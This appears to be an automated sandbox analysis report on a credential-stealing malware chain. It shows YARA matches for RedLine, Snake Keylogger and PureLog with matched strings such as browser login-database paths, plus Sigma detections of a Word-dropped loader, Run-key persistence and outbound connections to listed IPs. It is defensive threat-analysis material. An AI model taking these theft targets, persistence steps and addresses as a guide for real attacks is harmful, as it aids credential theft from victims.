10.2.npratlsN.pif.2b48a8ee.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
10.2.npratlsN.pif.2b48a8ee.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
4.2.brightness.exe.28f0000.3.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
14.2.npratlsN.pif.214f9a06.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.npratlsN.pif.214f9a06.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.npratlsN.pif.214f9a06.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.npratlsN.pif.214f9a06.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.npratlsN.pif.214f9a06.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d7d9:$a1: get_encryptedPassword 0x3d7ad:$a2: get_encryptedUsername 0x3d871:$a3: get_timePasswordChanged 0x3d789:$a4: get_passwordField 0x3d7ef:$a5: set_encryptedPassword 0x3d5bc:$a7: get_logins 0x38c37:$a10: KeyLoggerEventArgs 0x38c06:$a11: KeyLoggerEventArgsEventHandler 0x3d690:$a13: _encryptedPassword
14.2.npratlsN.pif.214f9a06.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48908:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47fab:$a3: \Google\Chrome\User Data\Default\Login Data 0x48208:$a4: \Orbitum\User Data\Default\Login Data 0x48be7:$a5: \Kometa\User Data\Default\Login Data
10.1.npratlsN.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
14.1.npratlsN.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
16.2.npratlsN.pif.2e310ee8.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
16.2.npratlsN.pif.2e310ee8.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
10.2.npratlsN.pif.2dd40000.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b38c:$s1: UnHook 0x3b328:$s2: SetHook 0x3b361:$s3: CallNextHook 0x3b2f0:$s4: _hook
16.2.npratlsN.pif.2e310ee8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
16.2.npratlsN.pif.2e310000.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b38c:$s1: UnHook 0x3b328:$s2: SetHook 0x3b361:$s3: CallNextHook 0x3b2f0:$s4: _hook
14.2.npratlsN.pif.23cc0000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.npratlsN.pif.23cc0000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f5d9:$a1: get_encryptedPassword 0x3f5ad:$a2: get_encryptedUsername 0x3f671:$a3: get_timePasswordChanged 0x3f589:$a4: get_passwordField 0x3f5ef:$a5: set_encryptedPassword 0x3f3bc:$a7: get_logins 0x3aa37:$a10: KeyLoggerEventArgs 0x3aa06:$a11: KeyLoggerEventArgsEventHandler 0x3f490:$a13: _encryptedPassword
14.2.npratlsN.pif.23cc0000.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a708:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49dab:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a008:$a4: \Orbitum\User Data\Default\Login Data 0x4a9e7:$a5: \Kometa\User Data\Default\Login Data
14.2.npratlsN.pif.23cc0000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d18c:$s1: UnHook 0x3d128:$s2: SetHook 0x3d161:$s3: CallNextHook 0x3d0f0:$s4: _hook
10.1.npratlsN.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
10.2.npratlsN.pif.2b489a06.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a708:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49dab:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a008:$a4: \Orbitum\User Data\Default\Login Data 0x4a9e7:$a5: \Kometa\User Data\Default\Login Data
13.2.Nsltarpn.PIF.20fe67a8.4.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x38cb0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x39330:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
14.2.npratlsN.pif.242f0000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.npratlsN.pif.242f0000.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.npratlsN.pif.242f0000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.npratlsN.pif.242f0000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.npratlsN.pif.242f0000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.npratlsN.pif.242f0000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
14.2.npratlsN.pif.242f0000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
16.2.npratlsN.pif.2ea90000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.npratlsN.pif.2ea90000.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
16.2.npratlsN.pif.2ea90000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.npratlsN.pif.2ea90000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.npratlsN.pif.2ea90000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.npratlsN.pif.2b489a06.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d18c:$s1: UnHook 0x3d128:$s2: SetHook 0x3d161:$s3: CallNextHook 0x3d0f0:$s4: _hook
16.2.npratlsN.pif.2ea90000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
10.2.npratlsN.pif.2e490000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
14.2.npratlsN.pif.23cc0ee8.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
14.2.npratlsN.pif.242f0000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
14.2.npratlsN.pif.23cc0ee8.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
10.2.npratlsN.pif.2e490000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.npratlsN.pif.2e490000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.npratlsN.pif.214f9a06.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b38c:$s1: UnHook 0x3b328:$s2: SetHook 0x3b361:$s3: CallNextHook 0x3b2f0:$s4: _hook
14.2.npratlsN.pif.214fa8ee.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.npratlsN.pif.214fa8ee.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.npratlsN.pif.214fa8ee.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.npratlsN.pif.214fa8ee.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.npratlsN.pif.214fa8ee.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.npratlsN.pif.214fa8ee.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
14.2.npratlsN.pif.214fa8ee.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
14.2.npratlsN.pif.214fa8ee.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
10.2.npratlsN.pif.2e490000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
16.1.npratlsN.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
16.2.npratlsN.pif.2bb8a8ee.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.npratlsN.pif.2bb8a8ee.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.npratlsN.pif.2bb8a8ee.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.npratlsN.pif.2bb8a8ee.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.npratlsN.pif.2bb8a8ee.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
10.2.npratlsN.pif.2e490000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.npratlsN.pif.2e490000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.npratlsN.pif.2bb8a8ee.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
16.2.npratlsN.pif.2ea90000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
10.2.npratlsN.pif.2e490000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
16.2.npratlsN.pif.2bb8a8ee.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
10.2.npratlsN.pif.2e490000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
16.2.npratlsN.pif.2ea90000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
10.2.npratlsN.pif.2e490000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
16.2.npratlsN.pif.2ea90000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
10.3.npratlsN.pif.29aec7e8.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.3.npratlsN.pif.29aec7e8.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.3.npratlsN.pif.29aec7e8.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.3.npratlsN.pif.29aec7e8.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.3.npratlsN.pif.29aec7e8.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.3.npratlsN.pif.29aec7e8.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
10.3.npratlsN.pif.29aec7e8.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
10.3.npratlsN.pif.29aec7e8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
14.2.npratlsN.pif.214fa8ee.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.npratlsN.pif.214fa8ee.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.npratlsN.pif.214fa8ee.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.npratlsN.pif.214fa8ee.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.npratlsN.pif.214fa8ee.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
14.2.npratlsN.pif.214fa8ee.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
14.2.npratlsN.pif.214fa8ee.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
Click to see the 254 entries

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 8092, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\npratlsN.pif, CommandLine: C:\Users\Public\Libraries\npratlsN.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\npratlsN.pif, NewProcessName: C:\Users\Public\Libraries\npratlsN.pif, OriginalFileName: C:\Users\Public\Libraries\npratlsN.pif, ParentCommandLine: C:\Windows\SysWOW64\brightness.exe, ParentImage: C:\Windows\SysWOW64\brightness.exe, ParentProcessId: 8092, ParentProcessName: brightness.exe, ProcessCommandLine: C:\Users\Public\Libraries\npratlsN.pif, ProcessId: 4544, ProcessName: npratlsN.pif

Sigma detected: File With Uncommon Extension Created By An Office Application

Source: File created

Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 7688, TargetFilename: C:\Windows\SysWOW64\brightness.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Nsltarpn.url, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 8092, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nsltarpn

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 132.226.8.169, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\npratlsN.pif, Initiated: true, ProcessId: 4544, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49754

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Nsltarpn.url, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 8092, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nsltarpn

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\npratlsN.pif, CommandLine: C:\Users\Public\Libraries\npratlsN.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\npratlsN.pif, NewProcessName: C:\Users\Public\Libraries\npratlsN.pif, OriginalFileName: C:\Users\Public\Libraries\npratlsN.pif, ParentCommandLine: C:\Windows\SysWOW64\brightness.exe, ParentImage: C:\Windows\SysWOW64\brightness.exe, ParentProcessId: 8092, ParentProcessName: brightness.exe, ProcessCommandLine: C:\Users\Public\Libraries\npratlsN.pif, ProcessId: 4544, ProcessName: npratlsN.pif

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49737, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 7688, Protocol: tcp, SourceIp: 147.124.216.113, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 46.151.208.21, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\Public\Libraries\npratlsN.pif, Initiated: true, ProcessId: 4544, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 52774

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T08:08:14.579595+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	166.62.27.188	443	TCP

